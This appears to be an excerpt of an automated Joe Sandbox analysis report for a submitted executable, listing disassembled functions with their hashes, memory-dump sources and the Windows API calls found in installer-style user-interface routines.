Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93178c5fcf97fe69890353bf3500c20e8bd1580ae6dc1d3dc8813b24988862b7
Instruction ID: 123777be4e922d3da7b69e5628bb1e606efc9ecd6d5c54da14ef1635763a7c26
Opcode Fuzzy Hash: 93178c5fcf97fe69890353bf3500c20e8bd1580ae6dc1d3dc8813b24988862b7
Instruction Fuzzy Hash: B0C18174E01218CFDB58DFA5C954B9DBBB2BF89300F5080A9D809AB365DB359E86CF11

Function 35A92E10 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abab36f051783e71349b2827c9345e552b58ea4de8a506f510128ed750eaa925
Instruction ID: 54a7701788724c891caad7d588d62bc5115184da407a5b447f98c0b32dfc3b54
Opcode Fuzzy Hash: abab36f051783e71349b2827c9345e552b58ea4de8a506f510128ed750eaa925
Instruction Fuzzy Hash: A4C19274E00258CFDB58DFA5C994B9DBBB2BF89300F5081A9D809AB365DB359D86CF10

Function 35A95660 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad47cd0a86ef3198f3a0ea5e49ba98f7d5f9c20bb6bb4412de2650c72a1e28e7
Instruction ID: d37dca4be0532d04145f4ed2544462a558aeb5afd3aeea1f949de1f4f7b89f63
Opcode Fuzzy Hash: ad47cd0a86ef3198f3a0ea5e49ba98f7d5f9c20bb6bb4412de2650c72a1e28e7
Instruction Fuzzy Hash: E2C18274E01218CFDB58DFA5C994B9DBBF2AF89300F5080A9D809AB365DB359D86CF10

Function 35A929B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c4df7686699eaa7f58232c4091e8544765647238c7c64062e5114d6cceba74d
Instruction ID: abbbb3d357a7be8e036f207a1d454dc42defd23ac5f4e899fbc739bff95aaa20
Opcode Fuzzy Hash: 4c4df7686699eaa7f58232c4091e8544765647238c7c64062e5114d6cceba74d
Instruction Fuzzy Hash: 97C18274E01258CFDB58DFA5C994B9DBBB2BF89300F1080A9D809AB365DB355D86CF50

Function 35A92108 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae46cbbd902838af3cc2ae75b225145e85219779b33296ea45a07138beebc7c
Instruction ID: 2d797908f4d8f91ec8ec77b4fb31f585c72d9d882009a33cbf324b359a6fc75d
Opcode Fuzzy Hash: 9ae46cbbd902838af3cc2ae75b225145e85219779b33296ea45a07138beebc7c
Instruction Fuzzy Hash: 28C18274E01258CFDB58DFA5C994B9DBBB2BF89300F1081A9D809AB365DB359D86CF10

Function 35A94820 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67953061d9679034af4624b492d26da9e9cc09f880ed3e3f985e6ef8c73978ba
Instruction ID: 3894b9c7df4409a2756de576bb0f2e0e0d6e5964f8b9f81629e1a01a1b0aaa67
Opcode Fuzzy Hash: 67953061d9679034af4624b492d26da9e9cc09f880ed3e3f985e6ef8c73978ba
Instruction Fuzzy Hash: AEC18174E00218CFDB58DFA5D994B9DBBB2BF89300F1081A9D809AB365DB355E86CF50

Function 35A97070 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbb6eaf44ce247bddc5a686985f514826c0a5bbbde5d2fef280e9d84f87c7e5e
Instruction ID: d4d9e722ee8569125adc4e9e3f8f8e367db8cbddee315e4e32b4b94696f3c110
Opcode Fuzzy Hash: fbb6eaf44ce247bddc5a686985f514826c0a5bbbde5d2fef280e9d84f87c7e5e
Instruction Fuzzy Hash: 8BC18174E00218CFDB58DFA5C994B9DBBB2BF89301F1081A9D809AB365DB355D86CF50

Function 35A91858 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ba44364b6f6dbbc5266553b4f0ff2649750c02c707226eacb230e15824efd7
Instruction ID: 2347590514655dc1adc8d1c74d51a1edfbc1b54a7c8afc917b7cf927d8be96d0
Opcode Fuzzy Hash: d9ba44364b6f6dbbc5266553b4f0ff2649750c02c707226eacb230e15824efd7
Instruction Fuzzy Hash: FEC19274E00258CFDB58DFA5C994B9DBBB2AF89300F1080A9D809AB365DB355D86CF50

Function 35A93B18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc298b00c9d31b094e42f38537354ef9c67b8f03f8055450dd65b9e420fbac9
Instruction ID: 41751d9d53156d9d9b908b80d1ee9491fdd1d80e274fa83eb34746dd78afb6ed
Opcode Fuzzy Hash: 2dc298b00c9d31b094e42f38537354ef9c67b8f03f8055450dd65b9e420fbac9
Instruction Fuzzy Hash: 76C19174E01258CFDB58DFA5C994B9DBBB2BF89300F1080A9D809AB365DB359D86CF50

Function 35A96368 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38abadd4404816ae11685ffba253d9bc79c12048e2e62afc43e2921aa70121f7
Instruction ID: 12fd861e96bc49441ccd098f33413dbc559dd4ddccbaeeef97ba1322ade6ab30
Opcode Fuzzy Hash: 38abadd4404816ae11685ffba253d9bc79c12048e2e62afc43e2921aa70121f7
Instruction Fuzzy Hash: 9AC18174E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D809AB365DB359D86CF50

Function 35A95AB8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c8b7f5c5fe549e78f5bc1f7c5dab4d9c78e8502c6e97c72507af8353a4ec130
Instruction ID: 4d46ef5fdbc29ab9a720a41096b03c3fdd1584dc98b70d2be50f345d7b6b6f8f
Opcode Fuzzy Hash: 4c8b7f5c5fe549e78f5bc1f7c5dab4d9c78e8502c6e97c72507af8353a4ec130
Instruction Fuzzy Hash: AFC18174E01218CFDB58DFA5C994B9DBBB2BF89300F5080A9D809AB365DB359D86CF50

Function 35A95208 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78a9500afb91b6d80518ba2467530f7f50470fd55f6be68691b46842641fd223
Instruction ID: 3314de1a1df36048032a05fbfe21550af3a9b7631eaa89f594a47e000e2e5a7f
Opcode Fuzzy Hash: 78a9500afb91b6d80518ba2467530f7f50470fd55f6be68691b46842641fd223
Instruction Fuzzy Hash: C7C19274E00258CFDB58DFA5C994B9DBBB2BF89300F1080A9D809AB365DB359D86CF10

Function 35A93268 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd6b97fe9be51898332604995049bb0747b6a8033d627975978b239d778b25ac
Instruction ID: 6e014e3a27b9cff6e42bf5b8febb7cb3b876b06f9affa46166bd17b481c29591
Opcode Fuzzy Hash: bd6b97fe9be51898332604995049bb0747b6a8033d627975978b239d778b25ac
Instruction Fuzzy Hash: 38C18174E00258CFDB59DFA5C994B9DBBF2AF89300F1081A9D809AB365DB359D86CF10

Function 354BC1F2 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de03b75ec9de58a02a5968619a2c8c7c51e2bcf7bf4ad9e654fd13ee1e8b50c9
Instruction ID: e5e04ba55646ffeadc0c856eb1099fb3d165956560766b6ac76779c7ea9f211f
Opcode Fuzzy Hash: de03b75ec9de58a02a5968619a2c8c7c51e2bcf7bf4ad9e654fd13ee1e8b50c9
Instruction Fuzzy Hash: C3C19274E00218CFDB58DFA5C994B9DBBB2BF89300F5081A9D409AB365DB759E86CF10

Function 354BDEF3 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 053b893bd33ed8302f6967e8a4b139e8964d904d7f37764518b2823dbc90a762
Instruction ID: afe4e3d75a6dc722376533af055c233faeaa0b2a5206c09cf55f1e0507accaa6
Opcode Fuzzy Hash: 053b893bd33ed8302f6967e8a4b139e8964d904d7f37764518b2823dbc90a762
Instruction Fuzzy Hash: 28C19274E00218CFDB58DFA5C994B9DBBB2BF89300F5081A9D809AB365DB759D86CF10

Function 354BF053 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28c7fa3a1e9863e6a6d69d5ae43d23ee29a314f21d0a1cf2c0c4a215204b0d84
Instruction ID: 64ee8ab75585f6f5c16ff15c385fd8dc63af22e087ba0f3fd37ae3e5a4847fbb
Opcode Fuzzy Hash: 28c7fa3a1e9863e6a6d69d5ae43d23ee29a314f21d0a1cf2c0c4a215204b0d84
Instruction Fuzzy Hash: 1DC1A274E00218CFDB58DFA5C994B9DBBB2BF89300F5081A9D809AB365DB759D86CF10

Function 354BE34B Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81359150b7f4ac322ca8826be393b3b1f14f9d2f297b60a9fd0b44a003b78fdb
Instruction ID: 42e9639d8f893f1c4e4ed1818e39e6df1b1a3d1c3375d41f4778f0765bd87452
Opcode Fuzzy Hash: 81359150b7f4ac322ca8826be393b3b1f14f9d2f297b60a9fd0b44a003b78fdb
Instruction Fuzzy Hash: 00C18374E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D409AB365DB759E86CF10

Function 354BDA9B Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 670ff3589cf9de8c8ae0a9ce882de8670a4462b44abb05d63081a778a605399f
Instruction ID: a35ef3feafd44465e19f7cb9120a59d62bfd96c897df004666e2ea5c6c829b6b
Opcode Fuzzy Hash: 670ff3589cf9de8c8ae0a9ce882de8670a4462b44abb05d63081a778a605399f
Instruction Fuzzy Hash: 02C19274E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D409AB365DB755E86CF10

Function 354BB4EC Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f1eb015136737f54383dd04f1f5c4336563fcf9b0456f28dd7250ababea24f
Instruction ID: acc2efd8e438ae09525fa373dcf836daaa3ce7fb459e3fefde53d5d261ec0ee0
Opcode Fuzzy Hash: 40f1eb015136737f54383dd04f1f5c4336563fcf9b0456f28dd7250ababea24f
Instruction Fuzzy Hash: 1BC19274E01218CFDB58DFA5C994B9DBBB2BF89300F5080A9D409AB365DB759E86CF10

Function 354BB944 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b54036ec7c7e0238c9b4029507de30454dc95e23129e82fb75f3f5585f617cc1
Instruction ID: ce8cd28e1a65901e409d1b9b2332dfc771ed3656db8395320a09aaf15931cbf6
Opcode Fuzzy Hash: b54036ec7c7e0238c9b4029507de30454dc95e23129e82fb75f3f5585f617cc1
Instruction Fuzzy Hash: 69C19274E00218CFDB58DFA5C954B9DBBB2BF89300F1081A9D809AB365DB755E86CF10

Function 354BB07F Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 141474445904241815ff067d5cae76091d00f2939b355bbe189e7d6a3c885e5b
Instruction ID: 5696d6a36251a4afa7fb4d952729f3e9b5f29ed30ed3624c3e0ef8ef14c2e9d5
Opcode Fuzzy Hash: 141474445904241815ff067d5cae76091d00f2939b355bbe189e7d6a3c885e5b
Instruction Fuzzy Hash: 65C19274E00218CFDB58DFA5C994B9DBBB2BF89300F1080A9D849AB365DB759D86CF10

Function 35A9CBE7 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 602e301bef3d4d67644c5457aa752eea27b118962e822ae0748ac41f4bfbc741
Instruction ID: cd7458777027b4a7e8da2a66dd6aca1eb641097927a8b35cd532919aae1a1e02
Opcode Fuzzy Hash: 602e301bef3d4d67644c5457aa752eea27b118962e822ae0748ac41f4bfbc741
Instruction Fuzzy Hash: 86D09E74E4422C9ACF15DF64DC546ECB770FF9A340F0024A9C48DA7110D7B09E94DA55

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,00000008), ref: 004056DC
GetDlgItem.USER32(?,000003EC), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,000003F8), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2

GetDlgItem.USER32(?,000003EC), ref: 0040574F
CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNEL32(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,00000008), ref: 0040578D
ShowWindow.USER32(00000008), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

{, xrefs: 004057F5
(7B, xrefs: 0040587D

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,?), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
EnableWindow.USER32(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: (7B
API String ID: 184305955-3251261122
Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,75923420,00435000,00000000), ref: 00403B59
lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

RichEdit, xrefs: 00403D33
Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C
.DEFAULT\Control Panel\International, xrefs: 00403B44
_Nb, xrefs: 00403C5C, 00403CC4
RichEd32, xrefs: 00403D14
(7B, xrefs: 00403B04
.exe, xrefs: 00403BE6
RichEd20, xrefs: 00403D06
RichEdit20W, xrefs: 00403D24, 00403D2A

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1425696872
Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 0040451E Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
GetDlgItem.USER32(?,000003E8), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,000003E8), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D

Strings

N, xrefs: 004046BA

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
